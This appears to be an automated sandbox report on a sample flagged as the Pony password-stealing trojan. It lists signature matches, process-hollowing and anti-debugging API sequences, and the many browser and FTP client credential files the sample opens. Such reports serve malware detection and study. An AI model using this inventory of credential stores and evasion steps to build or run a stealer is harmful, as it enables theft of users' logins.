Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: a5gvJhukP7.exe Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/0@0/1
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040D1E9 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore, 1_2_0040D1E9
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_004027AF LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle, 1_2_004027AF
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00402B2A WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle, 1_2_00402B2A
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040A6AF CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree, 1_2_0040A6AF
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA1950 LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,SizeofResource,LoadLibraryExA,GetProcAddress,ExitProcess, 0_2_00BA1950
Source: a5gvJhukP7.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: a5gvJhukP7.exe, 00000001.00000003.1710942974.00000000011F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: a5gvJhukP7.exe ReversingLabs: Detection: 89%
Source: unknown Process created: C:\Users\user\Desktop\a5gvJhukP7.exe "C:\Users\user\Desktop\a5gvJhukP7.exe"
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Process created: C:\Users\user\Desktop\a5gvJhukP7.exe "C:\Users\user\Desktop\a5gvJhukP7.exe"
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Process created: C:\Users\user\Desktop\a5gvJhukP7.exe "C:\Users\user\Desktop\a5gvJhukP7.exe"
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: samcli.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: msi.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: pstorec.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: mlang.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: a5gvJhukP7.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: Yara match File source: 0.3.a5gvJhukP7.exe.bab604.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.a5gvJhukP7.exe.bab604.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA433B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00BA433B
Source: a5gvJhukP7.exe Static PE information: real checksum: 0xf6c6 should be: 0x3001d
Source: a5gvJhukP7.exe Static PE information: section name: .zdata
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA3775 push ecx; ret 0_2_00BA3788
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00BA3775 push ecx; ret 1_2_00BA3788
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA1300 Sleep,LoadLibraryExA,GetProcAddress,_memset,CreateProcessA,LoadLibraryExA,GetProcAddress,VirtualAlloc,LoadLibraryExA,GetProcAddress,Wow64GetThreadContext,LoadLibraryExA,GetProcAddress,ReadProcessMemory,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,VirtualAllocEx,LoadLibraryExA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,LoadLibraryExA,GetProcAddress,Wow64SetThreadContext,LoadLibraryExA,GetProcAddress,ResumeThread,LoadLibraryExA,GetProcAddress,VirtualFree, 0_2_00BA1300
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00405024 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose, 1_2_00405024
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00404CB4 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose, 1_2_00404CB4
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040891F FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, 1_2_0040891F
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00403FE7 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, 1_2_00403FE7
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040966C FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose, 1_2_0040966C
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040879B FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, 1_2_0040879B
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040443E GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 1_2_0040443E
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\a5gvJhukP7.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA229A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00BA229A
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA1E10 LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,RtlCreateQueryDebugBuffer,GetCurrentProcessId,RtlQueryProcessDebugInformation,OutputDebugStringA,Sleep,RtlDestroyQueryDebugBuffer, 0_2_00BA1E10
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA433B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00BA433B
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA1000 mov eax, dword ptr fs:[00000030h] 0_2_00BA1000
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040F731 mov eax, dword ptr fs:[00000030h] 1_2_0040F731
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00BA1000 mov eax, dword ptr fs:[00000030h] 1_2_00BA1000
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA229A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00BA229A
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA3DEB _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BA3DEB
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_004102E0 SetUnhandledExceptionFilter,RevertToSelf, 1_2_004102E0
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00BA3DEB _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00BA3DEB
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00BA229A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00BA229A

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA1300 Sleep,LoadLibraryExA,GetProcAddress,_memset,CreateProcessA,LoadLibraryExA,GetProcAddress,VirtualAlloc,LoadLibraryExA,GetProcAddress,Wow64GetThreadContext,LoadLibraryExA,GetProcAddress,ReadProcessMemory,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,VirtualAllocEx,LoadLibraryExA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,LoadLibraryExA,GetProcAddress,Wow64SetThreadContext,LoadLibraryExA,GetProcAddress,ResumeThread,LoadLibraryExA,GetProcAddress,VirtualFree, 0_2_00BA1300
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Memory written: C:\Users\user\Desktop\a5gvJhukP7.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00410042 lstrcmpiA,LogonUserA,lstrlenA,LCMapStringA,LogonUserA,LogonUserA,LoadUserProfileA,ImpersonateLoggedOnUser,RevertToSelf,UnloadUserProfile,CloseHandle, 1_2_00410042
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Process created: C:\Users\user\Desktop\a5gvJhukP7.exe "C:\Users\user\Desktop\a5gvJhukP7.exe"
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00404313 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 1_2_00404313
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 1_2_0040443E
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA391F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00BA391F
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0041022F OleInitialize,GetUserNameA, 1_2_0041022F
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA1C70 GetVersionExA, 0_2_00BA1C70

Stealing of Sensitive Information

Source: Yara match File source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\wcx_ftp.ini
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\SharedSettings.ccs
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\Frigate3\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FTP Explorer\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccs
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\SiteDesigner\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqlite
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\SharedSettings_1_0_5.ccs
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqlite
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\TurboFTP\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccs
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\BlazeFtp\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\RhinoSoft.com\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\SharedSettings.ccs
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\TurboFTP
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\CuteFTP\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FTPInfo\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBIT
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.js
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\NetSarang\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\BitKinex\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xml
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\LeapWare\LeapFTP\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\GPSoftware\Directory Opus\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\BitKinex\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccs
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xml
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\AceBIT
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FlashFXP\3\History.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FTPInfo\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FileZilla\filezilla.xml
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccs
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\BitKinex\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\SharedSettings_1_0_5.sqlite
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Program Files (x86)\CuteFTP\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\SharedSettings.ccs
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FlashFXP\4\History.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccs
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\SmartFTP\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\GHISLER\wcx_ftp.ini
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\ExpanDrive\drives.js
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\BlazeFtp\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FlashFXP\4\Sites.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\INSoftware\NovaFTP\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FTP Explorer\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FTPGetter\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqlite
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\SharedSettings.sqlite
